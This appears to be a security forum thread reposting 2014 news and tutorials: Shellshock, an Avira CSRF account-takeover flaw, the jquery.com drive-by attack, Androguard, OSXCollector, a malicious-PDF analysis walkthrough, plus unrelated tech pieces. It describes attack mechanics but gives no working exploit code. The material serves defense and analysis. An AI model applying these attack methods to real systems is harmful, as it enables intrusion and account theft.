Bash-ing Into Your Network – Investigating CVE-2014-6271 Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169. Should I panic? The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process. What is vulnerable? This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash. Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today. The two most likely situations where this vulnerability will be exploited in the wild: Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell PHP applications running in CGI mode that call out to system() and where Bash is the default shell Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation. Is it as bad as Heartbleed? There has been a great deal of debate on this in the community, and we’re not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks. BUT – and that’s a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread. How can you protect yourself? The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though CVE-2014-6271 is not a complete fix, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it’s critical that they are protected behind a firewall. A big one. And test whether that firewall is secure. What can we do to help? Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help. Are Rapid7’s solutions affected? Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we’ll update this blog to keep you informed. Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
-
[h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h] So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness. https://www.youtube.com/watch?v=igxrvISaY4E All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator." This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP. Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP. No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS). Oh and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know. So anyway the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down. I apologize for all the caps but I had a lot of feels. Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
-
Google's latest object recognition tech can spot everything in your living room by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat. The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only vaguest of terms. Sursa: Google's latest object recognition tech can spot everything in your living room
-
Creste numarul de posturi, continut nou pe Google, SEO. Astfel, cand vor cauta oamenii pe Google "salut", vor ajunge pe RST si vor invata cum se saluta.
-
Un fix rapid e deja disponibil. apt-get update/yum update si ce mai vreti voi.
-
########################################################################## ################################# Androguard ############################# ########################################################################## ################### http://code.google.com/p/androguard ################## ######################## dev (at) androguard.re ########################## ########################################################################## 1 -] About Androguard (Android Guard) is primarily a tool written in full python to play with : - DEX, ODEX - APK - Android's binary xml 2 -] Usage You need to follow the following information to install dependencies for androguard : Installation - androguard - How to install Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting You must go to the website to see more example : Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.1 --] API 2.1.1 --] Instructions http://code.google.com/p/androguard/wiki/Instructions 2.2 --] Demos see the source codes in the directory 'demos' 2.3 --] Tools Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.4 --] Disassembler http://code.google.com/p/androguard/wiki/Disassembler 2.5 --] Analysis http://code.google.com/p/androguard/wiki/Analysis 2.6 --] Visualization Visualization - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.7 --] Similarities, Diffing, plagiarism/rip-off indicator http://code.google.com/p/androguard/wiki/Similarity http://code.google.com/p/androguard/wiki/DetectingApplications 2.8 --] Open Source database of android malwares DatabaseAndroidMalwares - androguard - Open Source database of android malware (links + signatures) - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.9 --] Decompiler 2.10 --] Reverse RE - androguard - Reverse Engineering Tutorial of Android Apps - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 3 -] Roadmap/Issues RoadMap - androguard - Features and roadmap - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting Issues - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 4 -] Authors: Androguard Team Androguard + tools: Anthony Desnos <desnos at t0t0.fr> DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com> 5 -] Contributors Craig Smith <agent dot craig at gmail dot com>: 64 bits patch + magic tricks 6 -] Licenses 6.1 --] Androguard Copyright © 2012, Anthony Desnos <desnos at t0t0.fr> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 6.2 -] DAD Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Sursa: https://github.com/androguard/androguard
-
Avira – Critical CSRF flaw Vulnerability puts millions users at risk by Pierluigi Paganini on September 20th, 2014 Egyptian bug hunter discovered that Avira Website is affected by CSRF flaw that allows attackers to hijack users’ accounts and access to their online backup. What do you think about if tell you that an antivirus could represent a menace for your system? Antivirus like any other kind of software could be exploited by threat actors to compromise the machine as already explained my previous post. The popular antivirus software Avira that includes a Secure Backup service is vulnerable to a critical web application vulnerability that could allow an attacker to take over the user’s account. The Egyptian 16 year-old expert Mazen Gamal reported to The Hacker News that the Avira Website is affected by a CSRF (Cross-site request forgery) vulnerability that allows an attacker to hijack users’ accounts and access to their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users’ account at risk. CSRF allows an end user to execute unwanted actions on a web application once he is authenticated, in a typical attack scheme attacker sends a link via email or through a social media platform, or share a specially crafted HTML exploit page to trick the victim into executing actions of the attacker’s choosing. In this specific case an attacker could use CSRF exploit to trick a victim into accessing a malicious link that contains requests which will replace victim’s email ID on Avira account with attacker’s email ID. This this CSRF attack the victim’s account could be easily compromised, by replacing the email address the attacker can easily reset the password of the victim’s account running the forget password procedure, bacause Avira will send the password reset link to attacker’s email ID instead of the victim’s ID. Once gained the access to the victim’s account the attacker would be able to retrieve its online backup, which include files the user has stored on the Online backup Software (https://dav.backup.avira.com/). “I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account,” Gamal said via an email to The Hacker News. “The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user.” Gamal also provided a Proof-of-Concept video to demonstrate its discovery. Gamal has reported the vulnerability to the Avira Security Team on August 21th, the team admitted the flaw and fixed the CSRF bug on their website, but the Secure online backup service “is still vulnerable to hackers until Avira will not offer a offline password layer for decrypting files locally.” Mazen Gamal has been recognized as an official bug hunter by Avira. Pierluigi Paganini (Security Affairs – AVIRA, CSRF) Sursa: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
-
Official jQuery Website Abused in Drive-by Download Attack By Eduard Kovacs on September 23, 2014 The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported. Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said. "Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privilege accounts holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post. According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit. The RIG exploit kit was recently seen in several malvertising campaigns. The exploit kit is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload. After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used. The redirector domain utilized in the attack (jquery-cdn[.]com) is hosted in Russia and it was registered on September 18, the day on which the attack started. Fortunately, the administrators of jQuery.com removed the malicious code, but the redirector domain is still online as of September 23. The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked. Sursa: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
-
How'd that malware get there? That's the question you've got to answer for every OSX malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer. A typical infection might follow a path like: a phishing email leads to a malicious download once installed, the initial establishes persistence then it reaches out on the network and pulls down additional payloads With the output of OSXCollector we quickly correlate between browser history, startup items, downloads, and installed applications. It makes root causing an infection, collect IOCs, and get to the bottom of an infection. So what does it do? OSXCollector gathers information from plists, sqlite databases and the local filesystems to get the information for analyzing a malware infection. The output is JSON which makes it easy to process it further by other tools. Usage Tool is self contained in one script file osxcollector. Launch OSXCollector as root or it will be unable to read data from all accounts $ sudo ./osxcollector.py Before running the tool make sure that your web browsers (Safari, Chrome or Firefox) are closed. Otherwise OS X Collector will not be able to access their diagnostic files for collecting the data. Sursa: https://github.com/Yelp/osxcollector
-
Malicious Documents – PDF Analysis in 5 steps Mass mailing or targeted campaigns that use common files to host or exploit code have been and are a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened trough a browser plug-in. In regards to malicious PDF files the security industry saw a significant increase of vulnerabilities after the second half of 2008 which might be related to Adobe Systems release of the specifications, format structure and functionality of PDF files. Most enterprise networks perimeters are protected and contain several security filters and mechanism that block threats. However a malicious PDF or MS Office document might be very successful passing trough Firewalls, Intrusion Prevention Systems, Anti-spam, Anti-virus and other security controls. By reaching the victim mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document. Then, for example, If the user opens a PDF malicious file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center Handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could be exploited without opening the file and just by having a malicious file on the hard drive as described by Didier Stevens. From a 100 feet view a PDF file is composed by a header , body, reference table and trailer. One key component is the body which might contains all kinds of content type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex which means the same information can be encoded and obfuscated in many ways. For example within objects there are streams that can be used to store data of any type of size. These streams are compressed and the PDF standard supports several algorithms including ASCIIHexDecode, ASCI85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, DCTCDecode called Filters. PDF files can contain multimedia content and support JavaScript and ActionScript trough Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All this features and capabilities are translated in a huge attack surface! From a security incident response perspective the knowledge about how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of files an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore it can help to be better prepared and identify future security incidents and how to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files. In case of malicious PDF files there are 5 steps. By using REMnux distro the steps are described by Lenny Zeltser as being: Find and Extract Javascript Deobfuscate Javascript Extract the shellcode Create a shellcode executable Analyze shellcode and determine what is does. A summary of tools and techniques using REMnux to analyze malicious documents are described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and illustrate an introduction to the tools and techniques below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of Adobe Reader Javascript engine to exploit CVE-2013-2729. This vulnerability found by Felipe Manzano exploits an integer overflow in several versions of the Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on Virus Total was only detected by 6 of the 55 AV engines. Let’s go through each one of the mentioned steps to find information on the malicious PDF key characteristics and its capabilities. 1st Step – Find and extract JavaScript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contain some of these keywords. In this case the first observations shows the PDF file contains 6 objects and 2 streams. No JavaScript mentioned but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms which might indicate it is malicious. Then looking deeper we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity but in this case the Object 2 is the /XFA element that is referencing to Object 1 which contains a stream compressed and rather suspicious. Following this indicator pdf-parser.py allows us to show the contents of an object and pass the stream trough one of the supporter filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) trough the –filter switch. The –raw switch allows to show the output in a easier way to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren’t on the original PDF file. If this document is opened by a victim the /XFA keyword will execute this malicious code. Another fast method to find if the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, execution of Javascript and shellcodes. When running the malicious PDF file against the last version of the tool it can show very useful information about the PDF structure, its contents and even detect which vulnerability it triggers in case it has a signature for it. 2nd Step – Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag. This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file. The JavaScript in this case was rather cryptic but there are tools and techniques that help do the job in order to interpret and execute the code. In this case I used another tool called js-didier.pl which is a Didier version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and prints the result into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup but was enough to produce several eval log files with interesting results. 3rd Step – Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file among other things contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode. Typically you find shellcode in JavaScript encoded in this way. These Unicode encoded strings need to be converted into binary. To perform this isolate the Unicode encoded strings into a separated file and convert it the Unicode (\u) to hex (\x) notation. To do this you need using a series of Perl regular expressions using a Remnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format (“\xeb\x06\x00\x00..”) that will be used in the next step to convert it into a binary 4th Step – Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.” 5th Step – Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify if machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there but its known to be a variant of the Game Over Zeus malware. The steps followed are manual but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 Steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys. However using these 5 steps many other questions could be answered. Using the mentioned and other tools and techniques within the 5 steps we can have a better practical understanding on how malicious documents work and which methods are used by Evi. Two great resource for this type of analysis is the Malware Analyst’s Cookbook : Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Technique. Sursa: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
-
The SSD Endurance Experiment: Only two remain after 1.5PB Another one bites the dust by Geoff Gasior — 11:35 AM on September 19, 2014 You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most. Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though—and you won't believe which one. Seriously, you won't. But I'll stop now. To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today. Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem. Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside miniscule cells built with process geometries as small as 16 nm. The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch—and there always is one—is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area. Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result. As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffering rash of reallocated sectors, programming failures, and erase failures before its ultimate demise. Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors split between an initial spate at 300TB and second accumulation near the end of the road. So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: Over the last 100TB, the Neutron compensated for over 3400 sector failures. And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it. Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible. We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm. Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests. Now that we've tended to the dead, it's time to check in on the living... Articol complet: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
-
An Analysis of the CAs trusted by iOS 8.0 Posted on September 22, 2014 by Karl Kornel iOS 8.0 ships with a number of trusted certificates (also known as “root certificates” or “certificate authorities”), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, and any intermediate certificates needed to make a “chain of trust” back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site’s certificate because it trusts a root certificate. iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I’m going to take a look at these 222 certificates. First I’m going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I’m going to look at who owns these trusted roots. Perl is Awesome Before I go on, a quick shootout: Perl is awesome! I used a Perl script to parse Apple’s list, and to generate the numbers below. If you want the script, here it is: The quick-and-dirty Perl script (signature) The list of CAs (signature) Key Sizes The root certificates use either RSA or ECC for their keys. Here’s how the numbers break down: 4096-bit RSA: 44 CAs 2048-bit RSA: 138 CAs 1024-bit RSA: 27 CAs 384-bit ECC: 12 CAs 256-bit ECC: 1 CA On the RSA side, the numbers don’t surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys, rather than move to ECC (or before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that’s good, but I am concerned by the algorithm choices. The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves are trustworthy, according to Safecurves. I would not be surprised if the number of ECC keys stays stable, and the number of RSA 4096-bit keys goes up. Most (if not all) of the widely-supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves into web browsers and servers. Signature Hashes When we look as the hashing algorithms used to sign these root certificates, SHA is the order of the day: SHA-512: 1 CA SHA-384: 17 CAs (including 12 of the CAs using ECC keys) SHA-256: 42 CAs (including 1 of the CAs using ECC keys) SHA-1: 149 CAs MD-5: 10 CAs MD-2: 3 CAs First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren’t used here, so I’m ignoring them! Again we see the slow move away from SHA-1, and that’s good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really? Looking at MD-5, both Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original “Class 1,2,3 Public Primary Certification Authority” CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong! This inclusion really surprises me: If you try to load your own MD-5 root certificate into iOS, it will not be trusted. And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms. Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not. Certificate Owners Companies It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0: AC Camerfirma SA: 4 CAs Apple: 4 CAs Comodo: 4 CAs Digicert: 8 CAs Entrust: 5 CAs Geotrust: 4 CAs Globalsign: 6 CAs Netlock Kft: 5 CAs Symantec: 6 CAs TC Trustcenter GMBH: 6 CAs Thawte: 12 CAs The Usertrust Network: 5 CAs Verisign: 17 CAs All told, Symantec owns thirty-five CAs, thanks to Verisign’s purchase of Thawte, and Symantec’s purchase of Verisign. I 